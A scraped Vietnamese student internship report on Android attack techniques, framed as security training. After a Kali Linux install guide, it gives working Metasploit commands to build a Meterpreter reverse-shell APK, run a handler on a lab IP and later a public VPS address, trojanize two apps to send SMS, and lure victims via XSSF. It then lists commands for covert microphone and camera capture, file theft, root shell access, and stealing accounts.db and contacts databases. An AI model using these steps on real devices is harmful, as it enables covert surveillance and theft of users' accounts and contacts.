SlideShare a Scribd company logo
1 of 61
Báo cáo đề tài thực tập 
1 
NHẬN XÉT 
(Của giáo viên hướng dẫn) 
........................................................................................................................................... 
........................................................................................................................................... 
........................................................................................................................................... 
........................................................................................................................................... 
........................................................................................................................................... 
........................................................................................................................................... 
........................................................................................................................................... 
........................................................................................................................................... 
........................................................................................................................................... 
........................................................................................................................................... 
........................................................................................................................................... 
........................................................................................................................................... 
........................................................................................................................................... 
........................................................................................................................................... 
.......................... , ngày …… tháng …… năm .......... 
Giáo viên hướng dẫn
Báo cáo đề tài thực tập 
2 
LỜI CẢM ƠN 
Trước tiên , em xin cảm ơn đến các thầy cô trong trường Đại học Khoa Học Tự Nhiên – 
TP Hồ Chí Minh và khoa Điện Tử Viễn Thông đã giảng dạy và truyền đạt cho em những kiến 
thức nền tảng , cần thiết trong suốt quá trình học tập vừa qua . 
Em cũng xin cảm ơn và biết ơn sâu sắc đến thầy Võ Đỗ Thắng , các thầy và anh chị trong 
trung tâm đào tạo quản trị và an ninh mạng quốc tế ATHENA đã tạo điều kiện cho em được thực 
tập trong mùa hè vừa qua , cũng đã giúp đỡ và hỗ trợ rất nhiều trong quá trình hoàn thành đề tài . 
Mặc dù đã nỗ lực hết khả năng của bản thân nhưng với lần đầu tiên trải nghiệm thực tế 
với kỳ thực tập nên chắc chắn sẽ có những thiếu sót trong quá trình hoàn thành báo cáo , mong 
nhận được sự thông cảm và ý kiến đóng góp tận tình để em có thể bổ sung những thiếu sót của 
bản thân . 
Một lần nữa em xin chân thành cảm ơn. 
Hồ Chí Minh , ngày 10 tháng 11 năm 2014 
Sinh Viên thực tập 
Nguyễn Quốc Vương
Báo cáo đề tài thực tập 
3 
Ảnh chụp cùng GV. Võ Đỗ Thắng. 
Ảnh chụp cùng GV.Trần Lâm Mẫn .
Báo cáo đề tài thực tập 
4 
I/LÀM TRÊN MẠNG LAN (CÓ WIFI) 
1/CÁCH CÀI ĐẶT KALI LINUX TRÊN VMWARE 
Sơ lược về hệ điều hành Kali Linux: 
- Kali Linux là một hệ điều hành được xây dựng trên nhân Linux , được thiết kế để kiểm 
tra bảo mật , thử nghiệm xâm nhập các hệ thống máy tính .Tiền thân của Kali Linux là 
BackTrack, xuất hiện năm 2006 và được các chuyên gia đánh giá bảo mật ưa chuộng sử 
dụng. Sau 7 năm liên tục phát triển , tháng 3 năm 2013 , hãng Offensive Security đã công 
bố phiên bản mới của BackTrack có thêm gần như tất cả các công cụ thiết yếu mà bất kì 
chuyên gia đánh giá bảo mật nào cũng cần sử dụng khi tác nghiệp .Nói về ưu điểm của 
Kali Linux là nói về nhưng thay đổi giữa BackTrack và Kali . So với BackTrack thì Kali 
có rất nhiều cải tiến : 
- Kali phát triển trên nền tảng hệ điều hành Debian Giao diện của phần mềm Vmwave 
+ Tính tương thích kiến trúc 
+ Hỗ trợ mạng không dây tốt hơn 
+ Khả năng tùy biến cao 
+ Dễ dàng nâng cấp các phiên bản Kali trong tương lai 
Cách cài đặt hệ điều hành Kali Linux trên Vmware 
- Giao diện của phần mềm VMware
Báo cáo đề tài thực tập 
5 
- Chọn Edit -> Vitual Network Editor…. -> AddNetwork -> OK 
- Chọn mục Bridge -> Bridge to . Ở đây chúng ta chọn card mạng thật (wifi hoặc LAN)-> 
OK.
Báo cáo đề tài thực tập 
- Về lại giao diện ban đầu của Vmware chọn Create a New Virtual Machine . Trên cửa sổ 
6 
mới chọn Custom -> Next.
Báo cáo đề tài thực tập 
7 
- Next 
- I will install operating system later . - > Next.
Báo cáo đề tài thực tập 
8 
- Chọn Linux .. lựa chọn version (Debian 64-bit) 
- ở phần location chúng ta chọn vị trí để lưu . Next
Báo cáo đề tài thực tập 
9 
- Next 
- Chọn dung lượng bộ nhớ RAM
Báo cáo đề tài thực tập 
10 
- Use bridged networking-> Next. 
- LSI Logic(Recommended)-> Next.
Báo cáo đề tài thực tập 
11
Báo cáo đề tài thực tập 
12
Báo cáo đề tài thực tập 
13
Báo cáo đề tài thực tập 
- Sau khi Finish -> Edit Virtual Machine . Ở phần CD/DVD ta chọn đường dẫn tới file ISO 
14 
đã download trước ->OK.
Báo cáo đề tài thực tập 
15 
- Đặt tên cho hệ thống
Báo cáo đề tài thực tập 
16 
- Đặt password để đăng nhập vào kali
Báo cáo đề tài thực tập 
17
Báo cáo đề tài thực tập 
18
Báo cáo đề tài thực tập 
19 
-Tiếnhànhcàiđặt
Báo cáo đề tài thực tập 
20 
- Hoàn tất việc cài đặt
Báo cáo đề tài thực tập 
21 
- Đăng nhập với Username là : root và password đã chọn.
Báo cáo đề tài thực tập 
22 
- Giao diện của hệ điều hành Kali Linux đã được khởi động
Báo cáo đề tài thực tập 
23 
2/ NGHIÊN CỨU CƠ CHẾ TẠO MÃ ĐỘC TRÊN KALI LINUX 
- Đầu tiên 
, kiểm tra địa chỉ IP bằng : ifconfig 
Địa chỉ IP : 192.168.1.14 
- Khởi động terminal và gõ dòng lệnh sau: 
Msfpayload android/meterpreter/reverse_tcp lhost=192.168.1.14 lport=8080 R > 
/root/Desktop/test.apk
Báo cáo đề tài thực tập 
- Máy sẽ tạo 1 file .apk ở bên ngoài desktop , kiểm tra kích thước của file để chắc là file đã 
24 
tạo thành công
Báo cáo đề tài thực tập 
25 
- Tiếp theo gõ lệnh : msfconsole
Báo cáo đề tài thực tập 
- Sau khi msfconsole load xong , ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ 
26 
lệnh sau: 
Use exploit/multi/handler 
Set payload/meterpreter/reverse_tcp 
Set lhost 192.168.1.14 – Địa chỉ IP đã kiểm tra ban đầu 
Set lport 8080 – nhập port giống với khi tạo payload ở trên 
Exploit 
- Sau đó màn hình sẽ hiện ra như bên dưới , lúc này đang chờ 1 máy android mở backdoor. 
- Thử giả lập 1 điện thoại và tải file test.apk về và tiến hành cài đặt :
Báo cáo đề tài thực tập 
- Sau khi cài đặt hoàn tất thì việc kết nối với 1 android đã được thực hiện , lúc này ở console 
27 
xuất hiện :
Báo cáo đề tài thực tập 
28 
- Ta có thể gõ lệnh help để biết được các lệnh :
Báo cáo đề tài thực tập 
29 
- Có một số lệnh cơ bản như 
 Để xem thông tin máy : sysinfo 
 Để sử dụng camera: webcam_list (xem danh sách camera) 
Webcam_snap x (sử dụng camera của android) 
 Để ghi âm : record_mic 
 Lấy file từ sdcard: cd/sdcard và ls (để xem danh sách thư mục,file) 
cd/sdcard/download (để tải về máy )
Báo cáo đề tài thực tập 
3/TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ 
ĐỘC 
30 
- Đầu tiên , khởi động Kali Linux -> khởi mở Terminal 
- Lần lượt thực hiện 3 lệnh để cập nhật Framework 
msfupdate 
cd /opt/metasploit/apps/pro/msf3 
svn export http://xssf.googlecode.com/svn/trunk/ ./ --force 
- Thực hiện lệnh “msfconsole” để khởi động Metasploit
Báo cáo đề tài thực tập 
- Tiếp tục gõ lệnh “load xssf Port=80 Uri=/xssf/ Public=true Mode=Verbose” để 
31 
thực hiện XSSF. 
- Thực hiện lệnh “xssf_urls” để nhận được các đường dẫn web như của XSSF Server 
, XSSF test page , XSSF logs page …. Sau đó 1 máy nạn nhân bất kì truy cập vào 
đường dẫn web XSSF test page :
Báo cáo đề tài thực tập 
32 
- Ta được kết quả như hình . Đồng thời máy tấn công cũng nhận được thông báo : 
New victim registered with id : 1 
- Để kiểm tra số lượng nạn nhân truy cập vào đường dẫn ta dùng lệnh “xssf_victims” 
lúc này sẽ xuất hiện lượng máy nạn nhân truy cập phải
Báo cáo đề tài thực tập 
33
Báo cáo đề tài thực tập 
- Bây giờ máy tấn công có thể xem thông tin và thực hiện khai thác dữ liệu về nạn 
34 
nhân bằng cách sử dụng lệnh : 
 Để kiểm tra thông tin về nạn nhân : 
xssf_information <ID máy nạn nhân> 
 Để kiểm tra các quyền 
Search auxiliary/xssf 
 Gửi thông báo xssf đến máy nạn nhân 
Use auxililary/xssf/public/misc/alert 
Run
Báo cáo đề tài thực tập 
4/CÀI ĐẶT TROJAN VÀO MÁY ANDROID QUA ỨNG DỤNG iCALENDAR VÀ 
iMATCH 
35 
Tải về và xem source code của các ứng dụng *.apk: 
- Dùng phần mềm Dex2Jar để chuyển đổi file *.dex thành file *.jar 
- Tiếp theo xem source code của ứng dụng *.apk bằng phần mềm Jd-gui 
- Sau khi tải ứng dụng định dạng *.apk về. Ta giải nén bằng phần mềm WinRAR. 
Sau đó copy file classes.dex của ứng dụng vào thư mục chứa phần mềm 
Dex2Jar 
- Mở command trong Window lên. 
Di chuyển đến thư mục phần mềm Dex2Jar bằng lệnh cd 
- Chuyển đổi file bằng lệnh “dex2jar <tên file>” 
- Dùng Jd-gui mở file classes_dex2jar.jar vừa được tạo để xem source code của 
ứng dụng
Báo cáo đề tài thực tập 
36 
- Lưu ý là chúng ta chỉ có thể xem nhưng không chỉnh sửa được. 
Cài đặt Trojan ứng dụng iCalendar.apk: 
 Thực hiện cài đặt Trojan ứng dụng iCalendar vào máy ảo Android 5554, sau 
đó tự động gửi tin nhắn đến máy ảo Android 5556. Ứng dụng iMatch cho 
phép gửi đi 1 tin nhắn. 
- Khởi động 2 máy ảo Android trên Eclipse 
- Khởi động phần mềm Super Apktool v2.1. Phần mềm sẽ quét và nhận diện các 
máy ảo Android đang chạy.
Báo cáo đề tài thực tập 
37 
Ở ô Device > Ta chọn máy mà ta muốn cài đặt trojan iCalendar.apk 
- Project > New Project 
- Chọn file iCalendar.apk > Chờ phần mềm giải nén xong
Báo cáo đề tài thực tập 
- View > View Smali Code: Cho phép chỉnh sửa code của ứng dụng iCalendar.apk 
38
Báo cáo đề tài thực tập 
39 
- Chỉnh sửa code của 2 file iCalendar.smali và SmsReceiver.smali 
- File iCalendar.smali, sửa code ở line 252 (số điện thoại của máy ta muốn gửi tin 
nhắn) và line 253 (là nội dung tin nhắn)
Báo cáo đề tài thực tập 
- File SmsReceiver.smali, ta sửa code ở line 41 thành số điện thoại mà máy mình 
40 
muốn gửi đến, giống như ở iCalendar.smali 
- Sau khi sửa code, ta phải Save lại 2 file trên. 
- Run > Build : cho phép bắt đầu quá trình cài đặt trojan iCalendar.apk vào 1 máy 
ảo Android và gửi tin nhắn tự động đến máy ảo Android khác.
Báo cáo đề tài thực tập 
- Kết quả ta nhận được ở máy Android có số điện thoại 5554 (bị cài đặt trojan 
41 
iCalendar.apk) 
- Giả sử nạn nhân trên click vào xem ứng dụng iCalendar này vài lần. Kết quả nhận 
được ở máy Android có số điện thoại 5556 (bị gửi tin nhắn tự động)
Báo cáo đề tài thực tập 
42 
Cài đặt Trojan ứng dụng iMatch: 
 Thực hiện cài đặt Trojan ứng dụng iMatch vào máy ảo Android 5558, sau đó 
tự động gửi tin nhắn đến 2 máy ảo Android 5556 và Android 5554. Ứng dụng 
iMatch cho phép gửi cùng lúc 4 tin nhắn. 
- Khởi động 3 máy ảo > Tạo project mới > Trỏ đến file iMatch.apk > Đợi ứng 
dụng được giải nén > View > View Smali Code (tương tự như thao tác với 
iCalendar.apk) 
- Sửa code của file MJUtils.smali
Báo cáo đề tài thực tập 
- Chỉnh sửa số điện thoại ở các line 57, line 66, line 75, line 84; chỉnh sửa nội dung 
43 
tin nhắn ở các line 58, line 67, line 76, line 85.
Báo cáo đề tài thực tập 
44 
- Run > Build : cho phép bắt đầu quá trình cài đặt trojan iMatch.apk và gửi tin 
nhắn tự động. 
- Kết quả ta nhận được ở máy Android có số điện thoại 5558 (bị cài đặt trojan 
iMatch.apk)
Báo cáo đề tài thực tập 
- Kết quả nhận được ở máy Android 5556 và Android 5554 (bị gửi tin nhắn tự động) 
45
Báo cáo đề tài thực tập 
II/LÀM TRÊN MÔI TRƯỜNG VPS(SERVER CÓ 
INTERNET) 
46 
1. Giới thiệu máy chủ ảo VPS: 
- Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy chủ 
vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host thì 
có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con số 
này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều. 
- Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có toàn 
quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS hạn 
chế 100% khả năng bị hack local. 
- Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung tài 
nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng
Báo cáo đề tài thực tập 
đến các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn 
công thì mọi tài khoản khác trên VPS đều hoạt động bình thường. 
- VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn nặng, 
nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi 
người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,… 
47 
2. Đặc điểm của VPS: 
- Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng, dung 
lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành riêng. 
- Tiết kiệm được nhiều chi phí so với việc thuê một server riêng. 
- Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng dụng 
khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng 
trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao… 
- Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên 
mà không cần phải khởi động lại hệ thống. 
- Có thể cài lại hệ điều hành với thời gian từ 5-10 phút. 
3. Giá trị khi sử dụng VPS: 
- Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS 
phù hợp. 
- Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng. 
- Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng. 
- Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection. 
- Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.
Báo cáo đề tài thực tập 
48 
4. Kết nối VPS: 
- Đối với máy hệ điều hành Windows, để có thể kết nối với máy chủ ảo VPS, ta cần 
sử dụng ứng dụng Remote Desktop Connection. 
- Để khởi động ứng dụng RDC này, ta chỉ cần vào Start > All Programs > 
Accessories > Remote Desktop Connection 
- Sau đó ta cần nhập vào Địa chỉ IP, Username và Password được cung cấp khi ta 
đăng ký tài khoản VPS. 
- Như vậy là ta đã có thể kết nối với máy chủ ảo VPS. 
CÀI ĐẶT METASPLOIT TRÊN VPS 
 Sau khi đã kết nối được máy VPS bằng quyền Administrator, ta tiến hành tải 
và cài đặt phần mềm Metasploit để phục vụ cho việc tấn công điện thoại 
Android 
1. Giới thiệu về phần mềm Metasploit: 
- Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm tra, 
tấn công và khai thác lỗi của các service. 
- Metasploit được xây dựng từ ngôn ngữ hướng đối tượng Perl, với những 
components được viết bằng C, Assembler, và Python. 
- Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, MacOS. 
2. Giới thiệu payload Meterpreter: 
- Meterpreter, viết tắt từ Meta-Interpreter là một advanced payload có trong 
Metasploit framework. 
- Muc đích của Meterpreter là để cung cấp những tập lệnh để khai thác, tấn câng các 
máy remote computers. Nó được viết từ các developers dưới dạng shared object( 
DLL) files.
Báo cáo đề tài thực tập 
- Meterpreter và các thành phần mở rộng được thực thi trong bộ nhớ, hoàn toàn 
không được ghi lên đĩa nên có thể tránh được sự phát hiện từ các phần mềm chống 
virus. 
- Trong bài viết này, để tấn công vào điện thoại Android thì ta sẽ sử dụng payload 
49 
Meterpreter này. 
3. Cài đặt Metasploit: 
Bước 1: Tải Metasploit bản mới nhất từ trang chủ www.metasploit.com hoặc trang 
download http://www.rapid7.com/products/metasploit/download.jsp . Ta sử dụng 
bản Community. 
Bước 2: Tiến hành đăng ký để tải Metasploit
Báo cáo đề tài thực tập 
Sau khi đăng ký, ta có thể tải về. Và ta nhận được 1 mail có chứa Key để 
Active Metasploit sau khi cài đặt. Mail này gửi về địa chỉ Email mà bạn đã đăng 
ký. 
Bước 3: Cài đặt phần mềm qua file đã tải về 
50 
- Chọn thư mục cài đặt 
- Chọn Port của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790 
- Chọn server và ngày hết hạn, để mặc định. 
- Nhấp Next và Metasploit sẽ được cài đặt vào thư mục đã chọn 
- Nhấp Finish và truy cập đến giao diện web của chương trình 
Bước 4: Active phần mềm Metasploit bằng cách truy cập vào link 
https://localhost:3790/ 
Tạo một tài khoản sử dụng:
Báo cáo đề tài thực tập 
51 
Nhập Key đã nhận từ email: 
Chọn ACTIVATE LICENSE 
Bước 5: Khởi động Metasploit bằng cách vào Start > Progams > Metasploit > 
Metasploit Console 
TẤN CÔNG MÁY ANDROID TỪ MÁY VPS 
1. Tạo ứng dụng chứa mã độc trên Kali Linux: 
Trước tiên, ta cần một ứng dụng backdoor để nạn nhân cài vào điện thoại Android
Báo cáo đề tài thực tập 
Bước 1: Khởi động máy ảo Kali Linux. Mở Terminal. 
Bước 2: Thực hiện lệnh sau để tạo mã độc từ payload Meterpreter: 
“msfpayload android/meterpreter/reverse_tcp lhost =<IP máy VPS> 
lport=<Mã port muốn dùng> R > <đường dẫn lưu trữ> / <tên file>” 
Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162 
lport=4444 R> /root/Desktop/hack.apk 
52 
2. Tấn công điện thoại Android: 
Bước 1: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể 
mất vài chục phút. 
Bước 2: Tiến hành thiết đặt payload bằng các lệnh 
 “ use exploit/multi/handler ” 
 “ set payload android/meterpreter/reverse_tcp ” 
 “ set lhost 14.0.21.162 ” 
 “ set lport 4444 ” 
 “ run ” 
Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở 
trên. 
Bước 3: Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy 
Android nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận 
được thông báo như sau: 
Bước 4: Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác
Báo cáo đề tài thực tập 
53 
3. Các phương thức tấn công được sử dụng: 
Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân. 
3.1 Ghi âm lén: 
Sử dụng lệnh: “ record_mic <số giây ghi âm> ” 
3.2 Sử dụng camera: 
Xem danh sách webcam của thiết bị: “ webcam_list ” 
Chụp ảnh lén: “webcam_snap <mã camera>” 
3.3 Tải và xóa file bất kỳ từ bộ nhớ sdcard: 
Di chuyển vào thư mục bằng lệnh: cd 
Tải về bằng lệnh: download <tên file> 
Xóa tập tin bằng lệnh: rm <tên file>
Báo cáo đề tài thực tập 
54 
3.4 Truy cập trực tiếp vào hệ thống: 
Truy cập vào hệ thống bằng lệnh: “shell” > “su” 
Kiểm tra máy đã root hay chưa bằng lệnh: “whoami” 
Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có thể 
tiếp tục tấn công. 
3.5 Truy cập và khai thác tài khoản người dùng: 
Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls –l” 
Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard”
Báo cáo đề tài thực tập 
55 
Trở về meterpreter và tải file accounts.db về: 
Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db
Báo cáo đề tài thực tập 
56 
3.6 Truy cập và đánh cắp danh bạ điện thoại: 
Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại: 
“cd /data/data/com.android.providers.contacts/databases” 
Copy về thẻ sdcard và tải về máy
Báo cáo đề tài thực tập 
57 
Xem nội dung của contacts2.db bằng SQLite Manager
Báo cáo đề tài thực tập 
58 
3.7 Một số câu lệnh khác: 
- Để biết thêm về các lệnh có thể thực hiện ta dùng help 
- Để xem thông tin về máy, nhập lệnh sysinfo 
- Để xem các tác vụ đang chạy gõ ps 
- Xem ip của máy bị hack ta gõ ipconfig 
- Xem danh sách thư mục, file gõ ls 
- Để upload gõ lệnh upload 
- ls -l danh mục file và các quyền 
- Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền 
/DATA 
/DATA/APP 
/DATA/SYSTEM
Báo cáo đề tài thực tập 
59 
/DATA/SYSTEM/accounts.db 
/DATA/SYSTEM/SYNC/accounts.xml 
/SYSTEM/APP/ 
- Để xem danh sách và down load các file hay thay đổi các file trong ROM 
Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập 
Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename 
Ví dụ chmod -R 777 /data 
- Ctrl + C để quay lại
Báo cáo đề tài thực tập 
60 
Contents 
NHẬN XÉT.................................................................................................................................... 1 
LỜI CẢM ƠN ................................................................................................................................ 2 
I/LÀM TRÊN MẠNG LAN (CÓ WIFI) ..................................................................................... 4 
1/CÁCH CÀI ĐẶT KALI LINUX TRÊN VMWARE............................................................... 4 
2/ NGHIÊN CỨU CƠ CHẾ TẠO MÃ ĐỘC TRÊN KALI LINUX ........................................ 23 
3/TẤN CÔNG VÀO THIẾT BỊ ANDROID THÔNG QUA LIÊN KẾT CHỨA MÃ ĐỘC ... 30 
4/CÀI ĐẶT TROJAN VÀO MÁY ANDROID QUA ỨNG DỤNG iCALENDAR VÀ iMATCH 
................................................................................................................................................... 35 
II/LÀM TRÊN MÔI TRƯỜNG VPS(SERVER CÓ INTERNET) ........................................ 46 
1. Giới thiệu máy chủ ảo VPS: ....................................................................................... 46 
2. Đặc điểm của VPS: ..................................................................................................... 47 
3. Giá trị khi sử dụng VPS: ............................................................................................. 47 
4. Kết nối VPS: ............................................................................................................... 48 
CÀI ĐẶT METASPLOIT TRÊN VPS .............................................................................. 48 
1. Giới thiệu về phần mềm Metasploit: .......................................................................... 48 
2. Giới thiệu payload Meterpreter: ................................................................................. 48 
3. Cài đặt Metasploit:...................................................................................................... 49 
TẤN CÔNG MÁY ANDROID TỪ MÁY VPS ................................................................ 51 
1. Tạo ứng dụng chứa mã độc trên Kali Linux: .............................................................. 51 
2. Tấn công điện thoại Android: ..................................................................................... 52 
3. Các phương thức tấn công được sử dụng: .................................................................. 53
Báo cáo đề tài thực tập 
61

More Related Content

What's hot

Huong dan su_dung_subversion
Huong dan su_dung_subversionHuong dan su_dung_subversion
Huong dan su_dung_subversion
Khicon Vodanh
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5
Nguyen Anh
 
Core java 8
Core java 8Core java 8
Core java 8
. .
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Trọng An
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMware
Nguyen Stone
 
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập androidVũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android
Anh Hiếu
 
Core java 9
Core java 9Core java 9
Core java 9
. .
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảo
thach28
 

What's hot (20)

Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2Bao cao thuc tap tuan 2
Bao cao thuc tap tuan 2
 
Huong dan su_dung_subversion
Huong dan su_dung_subversionHuong dan su_dung_subversion
Huong dan su_dung_subversion
 
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
ATHENA - Nguyen Xuan Ngoc - Tuan 3,4
 
Bài giảng kỹ thuật lập trình hook
Bài giảng kỹ thuật lập trình hookBài giảng kỹ thuật lập trình hook
Bài giảng kỹ thuật lập trình hook
 
Báo cáo đề tài 5
Báo cáo đề tài 5Báo cáo đề tài 5
Báo cáo đề tài 5
 
cài đặt metasploit
cài đặt metasploitcài đặt metasploit
cài đặt metasploit
 
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENABÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
BÁO CÁO ĐỀ TÀI TUẦN 1 - ATHENA
 
Core java 8
Core java 8Core java 8
Core java 8
 
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )Tạo mã độc trên vps để xâm nhập android ( môi trường internet  )
Tạo mã độc trên vps để xâm nhập android ( môi trường internet )
 
Bai giangvb.net
Bai giangvb.netBai giangvb.net
Bai giangvb.net
 
Virus toan tap
Virus toan tapVirus toan tap
Virus toan tap
 
Cài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMwareCài đặt kali linux trên máy ảo VMware
Cài đặt kali linux trên máy ảo VMware
 
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan NgocTạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
Tạo mã độc trên vps để xâm nhập android - Nguyen Xuan Ngoc
 
Tuan5
Tuan5Tuan5
Tuan5
 
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập androidVũ Thanh Hiếu   tạo mã độc trên kali linux để xâm nhập android
Vũ Thanh Hiếu tạo mã độc trên kali linux để xâm nhập android
 
Core java 9
Core java 9Core java 9
Core java 9
 
Virtualization – Proxmox
Virtualization – ProxmoxVirtualization – Proxmox
Virtualization – Proxmox
 
WinEoP Framework
WinEoP FrameworkWinEoP Framework
WinEoP Framework
 
Cách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảoCách tạo mã độc trên kali linux và triển khai trên android ảo
Cách tạo mã độc trên kali linux và triển khai trên android ảo
 
Hack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPSHack android dùng metasploit cài trên VPS
Hack android dùng metasploit cài trên VPS
 

Viewers also liked

Báo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳBáo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳ
thanhthong1210
 

Viewers also liked (12)

Bao cao tuan 5
Bao cao tuan 5Bao cao tuan 5
Bao cao tuan 5
 
Bao cao thuc tap
Bao cao thuc tapBao cao thuc tap
Bao cao thuc tap
 
ATBMTTDN ChgII CAC HINH THUC TAN CONG va KHAC PHUC
ATBMTTDN ChgII CAC HINH THUC TAN CONG va KHAC PHUCATBMTTDN ChgII CAC HINH THUC TAN CONG va KHAC PHUC
ATBMTTDN ChgII CAC HINH THUC TAN CONG va KHAC PHUC
 
Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014Báo cáo cuối kỳ ATHENA 31/07/2014
Báo cáo cuối kỳ ATHENA 31/07/2014
 
Nghiên cứu xây dựng ứng dụng bảo mật VoIP trên HĐH Android
Nghiên cứu xây dựng ứng dụng bảo mật VoIP trên HĐH AndroidNghiên cứu xây dựng ứng dụng bảo mật VoIP trên HĐH Android
Nghiên cứu xây dựng ứng dụng bảo mật VoIP trên HĐH Android
 
Báo cáo cuối kỳ Athena - Lê Nguyễn Vĩnh
Báo cáo cuối kỳ Athena - Lê Nguyễn VĩnhBáo cáo cuối kỳ Athena - Lê Nguyễn Vĩnh
Báo cáo cuối kỳ Athena - Lê Nguyễn Vĩnh
 
Báo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳBáo cáo đề tài thực tập cuối kỳ
Báo cáo đề tài thực tập cuối kỳ
 
Sperasoft talks: Android Security Threats
Sperasoft talks: Android Security ThreatsSperasoft talks: Android Security Threats
Sperasoft talks: Android Security Threats
 
Android Hacking + Pentesting
Android Hacking + Pentesting Android Hacking + Pentesting
Android Hacking + Pentesting
 
Lời cam đoan1
Lời cam đoan1Lời cam đoan1
Lời cam đoan1
 
Android Hacking
Android HackingAndroid Hacking
Android Hacking
 
Hacking Android OS
Hacking Android OSHacking Android OS
Hacking Android OS
 

Similar to Baocaocuoiki

Báo cáo thực tập tuần 1 phạm tiến quân
Báo cáo thực tập tuần 1   phạm tiến quânBáo cáo thực tập tuần 1   phạm tiến quân
Báo cáo thực tập tuần 1 phạm tiến quân
Quân Quạt Mo
 
Tuần 3 tạo mã độc trên kali linux
Tuần 3   tạo mã độc trên kali linuxTuần 3   tạo mã độc trên kali linux
Tuần 3 tạo mã độc trên kali linux
Hường Tô
 
Aircrack-ng.pdf
Aircrack-ng.pdfAircrack-ng.pdf
Aircrack-ng.pdf
HongoHuy
 

Similar to Baocaocuoiki (20)

Báo cáo thực tập tuần 1 phạm tiến quân
Báo cáo thực tập tuần 1   phạm tiến quânBáo cáo thực tập tuần 1   phạm tiến quân
Báo cáo thực tập tuần 1 phạm tiến quân
 
Bai bao cao 3
